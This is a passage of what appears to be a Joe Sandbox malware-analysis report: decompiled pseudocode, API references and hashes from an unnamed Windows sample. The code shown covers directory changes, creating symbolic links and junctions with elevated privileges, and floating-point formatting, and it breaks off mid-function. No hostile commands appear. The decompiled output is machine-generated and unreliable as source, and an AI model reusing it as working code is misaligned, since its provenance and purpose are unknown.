Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 407e3b615c0e84ece82aae9d33c1799e8f55457f6f46f45ce1481ea66c5a8f41
Instruction ID: 3ac474c01533fa234f63777b6fc156ae91a2cc6134bc641ecca9cfe170b97261
Opcode Fuzzy Hash: 407e3b615c0e84ece82aae9d33c1799e8f55457f6f46f45ce1481ea66c5a8f41
Instruction Fuzzy Hash: 77A0113008800A8A8E002B30CA0800C3B30EB20BC830202A8A00ACA0A2CB22880B8A00

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AC04 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4AC04(WCHAR* _a4) {
				signed int _t4;

				_t4 = SetCurrentDirectoryW(_a4); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}

0x00a4ac08
0x00a4ac13

APIs

SetCurrentDirectoryW.KERNELBASE(?,00A4AE72,C:\Users\user\Desktop,00000000,00A7946A,00000006), ref: 00A4AC08

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b4857599b4757b2cc9c6a2af87c45e3c5c26862e306b54bb435444178594c4f9
Instruction ID: 52afa4c205b70fddbb1793c42c4a9a6addfee6217a70ce08484d0d8fe4d4993e
Opcode Fuzzy Hash: b4857599b4757b2cc9c6a2af87c45e3c5c26862e306b54bb435444178594c4f9
Instruction Fuzzy Hash: 2EA011322002008BAA008B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C822AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A36FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A36FAA(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t98;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00A4EB78(_t98, _t253);
				E00A4EC50(0x30a8);
				if( *0xa71023 == 0) {
					E00A37A9C(L"SeRestorePrivilege");
					E00A37A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xa71023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00A313BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00A40602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00A53E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00A56088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00A56088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00A56066(_t199, _t236);
				_t112 = E00A53E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L11:
					E00A3A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00A3A231(_t200) != 0) {
						_t186 = E00A3A28F(E00A3A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00A3A1E0();
						} else {
							E00A3A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L20;
						}
						_t201 = 0;
						E00A32021(__eflags, 0x14, 0, _t200);
						E00A36D83(0xa71098, 9);
						goto L41;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L20:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L26:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00A56066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00A56066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L27:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00A39556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00A37A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00A39DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00A39620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00A3A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00A3959A(_t253 - 0x30b4);
											L41:
											E00A315FB(_t253 - 0x2c);
											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
											return _t201;
										}
										CloseHandle(_t239);
										E00A32021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L32:
											__eflags = E00A407BC();
											if(__eflags == 0) {
												E00A315C6(_t253 - 0x7c, 0x18);
												E00A415FE(_t253 - 0x7c);
											}
											L34:
											E00A36DCB(0xa71098, __eflags);
											E00A36D83(0xa71098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											L37:
											_t201 = 0;
											goto L41;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L34;
										}
										goto L32;
									}
									E00A36C23(_t200);
									E00A36D83(0xa71098, 9);
									goto L37;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L37;
								}
								goto L26;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00A56066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00A56066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L27;
						}
						E00A36C23(_t200);
						goto L37;
					}
				}
				if( *(_t253 - 0xd) != 0) {
					goto L37;
				}
				_t190 = E00A3BCC3(_t244 + 0x1104);
				_t269 = _t190;
				if(_t190 != 0) {
					goto L37;
				}
				_push(_t244 + 0x1104);
				_push(_t200);
				_push(_t244 + 0x28);
				_push(_t237);
				if(E00A37861(_t269) == 0) {
					goto L37;
				}
				goto L11;
			}

0x00a36faa
0x00a36fb4
0x00a36fc0
0x00a36fc7
0x00a36fd1
0x00a36fd6
0x00a36fd6
0x00a36fe5
0x00a36fe8
0x00a36fed
0x00a36ff0
0x00a37007
0x00a3701a
0x00a3701d
0x00a37025
0x00a37031
0x00a37036
0x00a3703b
0x00a3703e
0x00a37043
0x00a37045
0x00a37045
0x00a3704d
0x00a37057
0x00a3705c
0x00a37061
0x00a37065
0x00a37066
0x00a3706d
0x00a37073
0x00a37073
0x00a37061
0x00a37078
0x00a37084
0x00a37089
0x00a3708f
0x00a37092
0x00a3709c
0x00a370d6
0x00a370e1
0x00a370ee
0x00a370f7
0x00a370fc
0x00a370ff
0x00a37108
0x00a37101
0x00a37101
0x00a37101
0x00a370ff
0x00a37114
0x00a371e1
0x00a371e3
0x00000000
0x00000000
0x00a371ea
0x00a371ef
0x00a371fb
0x00000000
0x00a37127
0x00a37139
0x00a37142
0x00a37155
0x00a3715b
0x00a3715b
0x00a37161
0x00a37164
0x00a37205
0x00a37208
0x00a37213
0x00a37216
0x00a37219
0x00a3721f
0x00a37222
0x00a37228
0x00a3722b
0x00a37239
0x00a3723f
0x00a3724d
0x00a37255
0x00a37258
0x00a3725f
0x00a37274
0x00a37280
0x00a37280
0x00a37283
0x00a37286
0x00a3729e
0x00a372a0
0x00a372a3
0x00a372de
0x00a372e0
0x00a3735d
0x00a37369
0x00a3736d
0x00a37372
0x00a37375
0x00a37386
0x00a37399
0x00a373ac
0x00a373b7
0x00a373c2
0x00a373c7
0x00a373ce
0x00a373d4
0x00a373d4
0x00a373df
0x00a373e1
0x00a373e6
0x00a373e9
0x00a373f6
0x00a373fe
0x00a373fe
0x00a372e3
0x00a372ee
0x00a372f3
0x00a372f9
0x00a372fc
0x00a37305
0x00a3730a
0x00a3730c
0x00a37313
0x00a3731b
0x00a3731b
0x00a37320
0x00a37327
0x00a37330
0x00a37335
0x00a37338
0x00a37339
0x00a37340
0x00a3734a
0x00a37342
0x00a37342
0x00a37342
0x00a37350
0x00a37350
0x00000000
0x00a37350
0x00a372fe
0x00a37303
0x00000000
0x00000000
0x00000000
0x00a37303
0x00a372ad
0x00a372b6
0x00000000
0x00a372b6
0x00a3720a
0x00a3720d
0x00000000
0x00000000
0x00000000
0x00a3720d
0x00a3716d
0x00a37170
0x00a37176
0x00a37179
0x00a3717f
0x00a37182
0x00a37190
0x00a37196
0x00a371a4
0x00a371ac
0x00a371af
0x00a371b6
0x00a371cb
0x00000000
0x00a371d0
0x00a3714a
0x00000000
0x00a3714a
0x00a37114
0x00a370a2
0x00000000
0x00000000
0x00a370af
0x00a370b4
0x00a370b6
0x00000000
0x00000000
0x00a370c2
0x00a370c3
0x00a370c7
0x00a370c8
0x00a370d0
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00A36FAA
_wcslen.LIBCMT ref: 00A37013
_wcslen.LIBCMT ref: 00A37084

Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00

Part of subcall function 00A3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1
Part of subcall function 00A3A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A37139
CloseHandle.KERNEL32(00000000), ref: 00A37155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A37298

Part of subcall function 00A39DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
Part of subcall function 00A39DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70

Part of subcall function 00A39620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B

Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532

Strings

SeRestorePrivilege, xrefs: 00A36FC2
UNC\, xrefs: 00A37051
SeCreateSymbolicLinkPrivilege, xrefs: 00A36FCC
\??\, xrefs: 00A3702B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: 61c9d971a1b4c85331451aeb009f6f3c63e1eac4e41e16e2f0f8cd93c5746fc2
Instruction ID: d269c5113b13d6ac4729114a0424bc359a5e9d39a63de02bffb7a1b07e1b2570
Opcode Fuzzy Hash: 61c9d971a1b4c85331451aeb009f6f3c63e1eac4e41e16e2f0f8cd93c5746fc2
Instruction Fuzzy Hash: 9DC1E6B1D04648AADB35DBB4DD82FEEB3B8BF04300F008559F956E7182D774AA49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D8EE Relevance: 13.7, APIs: 3, Strings: 4, Instructions: 1427
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 68%

			E00A5D8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void* _t1056;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				signed int _t1151;
				signed int _t1152;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				unsigned int _t1168;
				void* _t1172;
				void* _t1173;
				unsigned int _t1174;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				intOrPtr* _t1185;
				signed int _t1186;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1192;
				signed int _t1194;
				signed int _t1195;
				void* _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				void* _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				intOrPtr* _t1216;
				intOrPtr* _t1217;
				signed int _t1219;
				signed int _t1221;
				signed int _t1224;
				signed int _t1230;
				signed int _t1234;
				signed int _t1235;
				void* _t1236;
				signed int _t1240;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1271;
				signed int _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1286;

				_t1142 = __edx;
				_t1271 = _t1273;
				_t1274 = _t1273 - 0x964;
				_t743 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t743 ^ _t1271;
				_push(__ebx);
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1185 = _a16;
				_v1924 = _t1185;
				_v1920 = _t1055;
				E00A5D416( &_v1944, __eflags);
				_t1234 = _a8;
				_t748 = 0x2d;
				if((_t1234 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1185 = _t748;
				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
				_t1186 = _a4;
				if((_t1234 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00A59994( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1186;
									_a8 = _t1234 & 0x7fffffff;
									_t1286 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1188 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1188 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1189 = _t1188 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1240;
									E00A5F460(_t1078, _t1286);
									_push(_t1078);
									_push(_t1078);
									 *_t1274 = _t1286;
									E00A5F570();
									_t790 = L00A623A0(_t1143);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1189;
									_v464 = _t1189;
									_t1061 = (0 | _t1189 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1240;
									if(_t1240 < 0) {
										__eflags = _t1240 - 0xfffffc02;
										if(_t1240 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00A5BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1258 = _t1109;
														_t1216 =  &_v468 + _t1109 * 4;
														_v1880 = _t1216;
														while(1) {
															__eflags = _t1258 - _t1061;
															if(_t1258 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1216;
															}
															_t210 = _t1258 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1168 = 0;
																__eflags = 0;
															} else {
																_t1168 =  *(_t1216 - 4);
															}
															_t1216 = _t1216 - 4;
															_t972 = _v1880;
															_t1258 = _t1258 - 1;
															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1258 - 0xffffffff;
															if(_t1258 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1240 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1192 = 1 - _t1240;
											E00A4FFF0(_t1192,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1172 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
														goto L101;
													}
													_t1172 = _t1172 + 4;
													__eflags = _t1172 - 8;
													if(_t1172 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1173 = 0;
															__eflags = 0;
														} else {
															_t1173 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1259 = _t1110;
														__eflags = _t975 - _t1173 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1217 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1173 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1259 - _t1061;
															if(_t1259 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1217;
															}
															_t175 = _t1259 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1174 = 0;
																__eflags = 0;
															} else {
																_t1174 =  *(_t1217 - 4);
															}
															_t1217 = _t1217 - 4;
															_t981 = _v1880;
															_t1259 = _t1259 - 1;
															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1259 - 0xffffffff;
															if(_t1259 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1219 = _t1111 >> 5;
